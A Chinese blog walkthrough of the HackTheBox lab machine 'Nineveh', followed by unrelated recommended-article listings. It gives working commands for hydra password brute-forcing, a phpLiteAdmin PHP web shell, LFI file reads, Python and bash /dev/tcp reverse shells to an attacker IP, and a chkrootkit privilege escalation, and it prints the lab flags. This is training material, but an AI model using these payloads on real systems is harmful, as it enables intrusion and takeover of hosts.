[Meachines] [Medium] nineveh phpLiteAdmin代码注入+LFI(pany)文件读取+Ports Knocking+TRP00F权限提升+chkrootkit权限提升

最新推荐文章于 2024-08-14 11:05:13 发布
最新推荐文章于 2024-08-14 11:05:13 发布
阅读量512 收藏 5
点赞数 3
分类专栏: HackTheBox 文章标签: 自动化
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141142269
版权

信息收集

IP AddressOpening Ports
10.10.10.43TCP:80,443

$ nmap -p- 10.10.10.43 --min-rate 1000 -sV -sC

PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request

phpLiteAdmin

$ gobuster dir -u 'https://10.10.10.43' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -b 403,404 -x php,txt,html -k

image.png

https://10.10.10.43/db/

image-1.png

$ hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect password."

username:admin
password:password123

image-4.png

https://www.exploit-db.com/exploits/24044

image-5.png

1.创建rev.php表:

image-6.png

2.创建字段:

https://10.10.10.43/db/index.php?switchdb=%2Fvar%2Ftmp%2Frev

image-7.png

3.输入字段的名称,并确保将类型设置为 TEXT,然后在默认值中输入以下 PHP 代码:

<?php system($_GET[1]);?>

image-8.png

LFI

$ gobuster dir -u 'http://10.10.10.43/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 403,404 -x php,txt,html

image-2.png

image-3.png

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password\!"

username:admin
password:1q2w3e4r5t

image-12.png

http://10.10.10.43/department/manage.php

image-11.png

https://github.com/MartinxMax/pany

$ python3 pany.py -u 'http://10.10.10.43/department/manage.php?notes=/ninevehNotes/*' --cookie "PHPSESSID=o9gl3hqas474agdtlemcgscn50;"

image-13.png

+-------------------+-------+-------+----------------------+-------------------+
| User              |   UID |   GID | Home                 | Shell             |
+===================+=======+=======+======================+===================+
|      root         |     0 |     0 | /root                | /bin/bash         |
+-------------------+-------+-------+----------------------+-------------------+
| daemon            |     1 |     1 | /usr/sbin            | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| bin               |     2 |     2 | /bin                 | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| sys               |     3 |     3 | /dev                 | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| games             |     5 |    60 | /usr/games           | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| man               |     6 |    12 | /var/cache/man       | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| lp                |     7 |     7 | /var/spool/lpd       | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| mail              |     8 |     8 | /var/mail            | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| news              |     9 |     9 | /var/spool/news      | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| uucp              |    10 |    10 | /var/spool/uucp      | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| proxy             |    13 |    13 | /bin                 | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| www-data          |    33 |    33 | /var/www             | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| backup            |    34 |    34 | /var/backups         | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| list              |    38 |    38 | /var/list            | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| irc               |    39 |    39 | /var/run/ircd        | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| gnats             |    41 |    41 | /var/lib/gnats       | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| nobody            | 65534 | 65534 | /nonexistent         | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+
| systemd-timesync  |   100 |   102 | /run/systemd         | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| systemd-network   |   101 |   103 | /run/systemd/netif   | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| systemd-resolve   |   102 |   104 | /run/systemd/resolve | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| systemd-bus-proxy |   103 |   105 | /run/systemd         | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| syslog            |   104 |   108 | /home/syslog         | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| _apt              |   105 | 65534 | /nonexistent         | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| lxd               |   106 | 65534 | /var/lib/lxd/        | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| mysql             |   107 |   111 | /nonexistent         | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| messagebus        |   108 |   112 | /var/run/dbus        | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| uuidd             |   109 |   113 | /run/uuidd           | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| dnsmasq           |   110 | 65534 | /var/lib/misc        | /bin/false        |
+-------------------+-------+-------+----------------------+-------------------+
| sshd              |   111 | 65534 | /var/run/sshd        | /usr/sbin/nologin |
+-------------------+-------+-------+----------------------+-------------------+

$ curl 'http://10.10.10.43/department/manage.php?notes=/ninevehNotes/../../../var/tmp/rev.php&1=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.16.24%22%2C10034%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27' --cookie "PHPSESSID=o9gl3hqas474agdtlemcgscn50;"

image-14.png

www-data to amrois

Ports Knocking

$ cat /etc/knockd.conf

image-16.png

$ knock 10.10.10.43 571 290 911 -d 300 -v

image-22.png

$ strings /var/www/ssl/secure_notes/nineveh.png

image-17.png

$ ssh -i id_rsa amrois@10.10.10.43

image-23.png

User.txt

56e41c6deea1a000bba08a2bd96c364c

权限提升

TRP00F 自动化权限提升

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.24 --lport 10011 --rhost 10.10.16.24 --rport 10035 --http 9999

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y

image-24.png

chkrootkit 权限提升

$ echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.24/10035 0>&1'">/tmp/update

$ chmod 777 /tmp/update

image-25.png

Root.txt

508ffee94c9c1c12a1ec833ae97b93bb

Мартин.
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox-Nineveh(考点:hydra/phpliteadmin/LFI/图片密码/端口敲门/chkrootkit
冬萍子癸水
04-10 623
nmap 80/443都是网页,一个http,一个https 两个都打开看看,并dirbuster扫扫 80打开department是登录框。 没有别的什么信息。应该只有暴力破解了。 ctrl+u再看看, 说登录页有问题,那可以SQL注入么? 试了几种却不行。。 只有暴力干它了,还好这里有提示admin账号和amrois用户应该存在,不然连用户名都得暴力破解,浪费时间。。 burp抓包,获得...
vulnhub - zico2(考点: LFI & phpliteadmin & tar/zip 提权 & 版本提权)
冬萍子癸水
04-26 553
https://www.vulnhub.com/entry/zico2-1,210/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很常规,22想到可能的ssh登录,80是进web搜集信息 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-...
HackTheBox-Machines--Nineveh
七天
05-30 724
Nineveh测试过程。
废物的靶场日记 htb-oscp-beep+cronos+nineveh
m0_53302733的博客
03-29 1329
HTB-oscplike-beep+cronos+nineveh Beep easy难度的beep 靶机IP10.10.10.7 sudo nmap -sC -sV -A --min-rate=5000 -p- -Pn 10.10.10.7 访问80后发现是一个elastix searchsploit搜到php/webapps/18650.py 修改参数后发现有一个extension需要修改但是不知道是什么勾八 google elastix extension后发现是sip extension 用svwar
htb-linux-8-nineveh-hydra-Pspy-chkrootkit
admin741admin的博客
06-09 318
exploit关键词。
HTB靶场系列 linux靶机 Nineveh靶机
m0_57221101的博客
01-17 4440
勘探 nmap勘探 nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http
htb-nineveh
m0_55772907的博客
09-19 246
htb
【Hack The Box】linux练习-- Nineveh
人间体佐菲的博客
11-09 834
【Hack The Box】linux练习-- Nineveh
oscp——Nineveh: v0.3
王嘟嘟的博客
01-28 1436
0x00 前言 这个是vulnhub的第十二个机子,根据朋友提供的一张表上面找的。希望一切顺利。 为了方便后来者学习,我将在以后的记录中尽可能的详细,但是之前写过的文章不在重写补充,有疑问可直接问我。 最后,%E7%8E%8B%E5%98%9F%E5%98%9F%E8%80%81%E5%A9%86%E6%88%91%E7%88%B1%E4%BD%A0%E5%93%9F 链接 https://www...
【自用】Python爬虫学习(七):selenium网页自动化操作
Lucky_云佳的博客
08-14 269
selenium是一个广泛使用的开源自动化测试框架,主要用于Web应用程序的功能测试。selenium可以很好地处理动态加载的Web内容,包括AJAX和JavaScript生成的元素,覆盖面更广。
基于springboot+mybatis实现的学生管理系统
08-14
springboot 但功能包含(学生,教师,管理员),项目基于springboot2.1.x实现的管理系统。如果你是spring boot初学者,那么此项目非常适合你。如果喜欢,请随手给个star,谢谢。 编译环境 : jdk 1.8 mysql 5.5 tomcat 7 框架 : springboot2.0 mybatis jar包管理工具: Maven 编译器 : IDEA 系统功能 : 学生信息管理 班级信息管理 教师信息管理 课程信息管理 选课信息管理 考勤信息管理 请假信息管理 成绩信息管理 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
rabbitmq-server-3.8.30-1.el7.noarch.rpm
08-14
rabbitmq-server-3.8.30-1.el7.noarch.rpm 是 RabbitMQ 3.8.30 版本的 RPM 软件包,专为 CentOS 7、RHEL 7 等使用 el7 标识的 Linux 发行版构建的。noarch 表示该包是架构无关的,即适用于任何 CPU 架构。此软件包包含 RabbitMQ 服务器及其所需的运行时组件。 rabbitmq-server-3.8.30-1.el7.noarch.rpm 是 RabbitMQ 3.8.30 版本的 RPM 软件包,专为 CentOS 7、RHEL 7 等使用 el7 标识的 Linux 发行版构建的。noarch 表示该包是架构无关的,即适用于任何 CPU 架构。此软件包包含 RabbitMQ 服务器及其所需的运行时组件。
BMS电池管理常用芯片-ads1256(耘天科技).pdf
08-14
BMS电池管理常用芯片,让设计与众不同。
基于Android网络音乐播放器APP设计与实现.docx
08-14
基于Android网络音乐播放器APP设计与实现.docx
Evidently AI - 内部机器学习平台的终极清单
最新发布
08-14
Evidently AI - 内部机器学习平台的终极清单
整理的openjpeg-2.5.2源码,含vs解决方案和vs工程文件、第三方库工程以及两个测试程序
08-14
整理的openjpeg-2.5.2源码,含vs解决方案和vs工程文件、第三方库工程以及两个测试程序,下载下来就能直接编译。OpenJPEG 是用 C 语言编写的开源 JPEG 2000 编解码器。它的开发是为了促进JPEG 2000的使用,这是来自联合图像专家组 ( JPEG ) 的静态图像压缩标准。自 2015 年 5 月起,OpenJPEG 被 ISO/IEC 和 ITU-T 正式认可为JPEG 2000 参考软件。
印象阿里政委体系之阿里政委定位与职责精解.pptx
08-14
印象阿里政委体系之阿里政委定位与职责精解.pptx
yolov5-7.0源码,附yolov5s分割模型权重
08-14
yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。 yolov5-7.0源码,附yolov5s分割模型权重。
战略执行力-战略解码(精华版).pptx
08-14
战略执行力-战略解码(精华版).pptx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值